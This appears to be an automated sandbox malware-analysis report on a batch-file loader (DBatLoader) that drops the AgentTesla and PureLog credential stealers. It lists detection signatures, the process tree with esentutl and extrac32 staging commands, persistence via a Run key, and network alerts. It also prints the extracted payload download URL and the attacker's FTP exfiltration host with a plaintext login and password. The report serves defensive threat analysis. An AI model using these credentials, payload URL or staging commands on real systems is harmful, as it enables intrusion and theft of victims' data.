
Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Sample name: z1Transaction_ID_REF2418_cmd.bat
Analysis ID: 1545203
MD5: 597443c0b1405f3deaa48eef7de516c4
SHA1: 8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256: 553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
Tags: bat, user-Porcupine

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 6544 cmdline: extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 4888 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
      • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 2308 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 5716 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xrbjyllC.pif (PID: 4544 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cllyjbrx.PIF (PID: 1440 cmdline: "C:\Users\Public\Libraries\Cllyjbrx.PIF" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
    • xrbjyllC.pif (PID: 4108 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • sgxIb.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cllyjbrx.PIF (PID: 1068 cmdline: "C:\Users\Public\Libraries\Cllyjbrx.PIF" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
    • xrbjyllC.pif (PID: 6568 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • sgxIb.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(73 memory-dump entries in total; only the first five are listed here)
Source | Rule | Description | Author
9.1.xrbjyllC.pif.400000.3.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
17.1.xrbjyllC.pif.400000.2.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
11.2.xrbjyllC.pif.400000.2.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
11.2.xrbjyllC.pif.29a80000.9.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
11.2.xrbjyllC.pif.29a80000.9.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(198 unpacked-PE entries in total; only the first five are listed here)

                  System Summary

Source: File created
Author: frack113, Nasreddine Bencherchali
Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Source: Process started
Author: Florian Roth (Nextron Systems), Tim Shelton
Data: Command: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xrbjyllC.pif, NewProcessName: C:\Users\Public\Libraries\xrbjyllC.pif, OriginalFileName: C:\Users\Public\Libraries\xrbjyllC.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4888, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, ProcessId: 4544, ProcessName: xrbjyllC.pif

Source: Registry Key set
Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
Data: Details: C:\Users\Public\Cllyjbrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cllyjbrx

Source: Network Connection
Author: Florian Roth (Nextron Systems), Tim Shelton
Data: DestinationIp: 172.67.74.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\xrbjyllC.pif, Initiated: true, ProcessId: 4544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\Public\Cllyjbrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cllyjbrx

Source: Process started
Author: Max Altgelt (Nextron Systems)
Data: Command: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xrbjyllC.pif, NewProcessName: C:\Users\Public\Libraries\xrbjyllC.pif, OriginalFileName: C:\Users\Public\Libraries\xrbjyllC.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4888, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, ProcessId: 4544, ProcessName: xrbjyllC.pif
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T08:35:22.962696+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 110.4.45.197 | 21 | TCP
2024-10-30T08:35:39.357736+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 110.4.45.197 | 21 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T08:35:23.900856+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 110.4.45.197 | 54601 | TCP
2024-10-30T08:35:23.907031+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 110.4.45.197 | 54601 | TCP
2024-10-30T08:35:40.260221+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 110.4.45.197 | 63940 | TCP
2024-10-30T08:35:40.266852+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 110.4.45.197 | 63940 | TCP


                  AV Detection

Source: z1Transaction_ID_REF2418_cmd.bat | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 31%
Source: z1Transaction_ID_REF2418_cmd.bat | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

                  Compliance

Source: C:\Users\Public\Libraries\xrbjyllC.pif | Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,13_2_00401612

                  Networking

Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49744 -> 110.4.45.197:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49747 -> 110.4.45.197:54601
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49754 -> 110.4.45.197:63940
Source: Malware configuration extractor | URLs: https://himalayastrek.com/origins/233_Cllyjbrxmng
Source: global traffic | TCP traffic: 110.4.45.197 ports 50707,62466,63940,62962,56275,55553,1,2,53369,54601,61195,21
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031DE4B8 InternetCheckConnectionA,3_2_031DE4B8
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 110.4.45.197:50707
Source: Joe Sandbox View | IP Address: 110.4.45.197
Source: Joe Sandbox View | IP Address: 172.67.74.152
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | DNS query: name: api.ipify.org (observed 2 times)
Source: unknown | FTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49734, server banner:
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 10 of 50 allowed.
  220-Local time is now 15:35. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic | HTTP traffic detected (observed 6 times): GET /origins/233_Cllyjbrxmng HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: himalayastrek.com
Source: global traffic | HTTP traffic detected (observed 6 times): GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 3 times)
Source: global traffic | DNS traffic detected: DNS query: himalayastrek.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ftp.haliza.com.my
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
String found in binary or memory (each of the following URLs was found in all five dumps listed above):
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl.comodoca.com/AAACertificateServices.crl04
  • http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
  • http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
